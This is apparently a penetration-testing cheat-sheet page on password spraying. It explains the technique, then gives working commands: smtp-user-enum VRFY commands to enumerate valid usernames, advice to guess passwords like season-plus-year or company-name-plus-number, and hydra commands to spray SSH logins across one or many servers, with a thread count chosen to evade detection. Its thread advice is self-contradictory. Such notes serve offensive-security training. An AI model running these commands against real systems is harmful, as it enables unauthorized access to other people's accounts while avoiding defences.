Password Spray
Rather than the usual dictionary brute force methods involving a dictionary of hundreds if not millions of password entries, the idea of password spray is to reverse the process: introduce a list of as many users as possible, while trying just a single password attempt against tens or hundreds of user accounts.
Here is a username list example:
https://github.com/insidetrust/statistically-likely-usernames
We can enumerate usernames using SMTP
VRFY method:head -n 50 john.txt > users.txt
smtp-user-enum -M VRFY -U users.txt -t $IP
This is same as the Metasploit module
auxiliary/scanner/smtp/smtp_enum .Now that we have validated some users, we should determine one (recommended) or two (maximum) commonly-used passwords we can use for our attack.
Regarding commonly used passwords, real-world experience has shown that one of the most commonly used passwords are usually found to be the current season, along with the current year, e.g., Spring2022.
Another very common password is "CompanyName" along with a numerical value, e.g., FooCorp01, FooCorp02, etc.
Spray a single server:
hydra -L users.txt -p <password> ssh://$IP -t 4
Spray multiple servers:
hydra -l <username> -p <password> -M ssh_servers.txt ssh -t 4
When bruteforcing SSH, always use 4 threads. This is because >= 4 threads may get caught by defense mechanism.
Last modified 9mo ago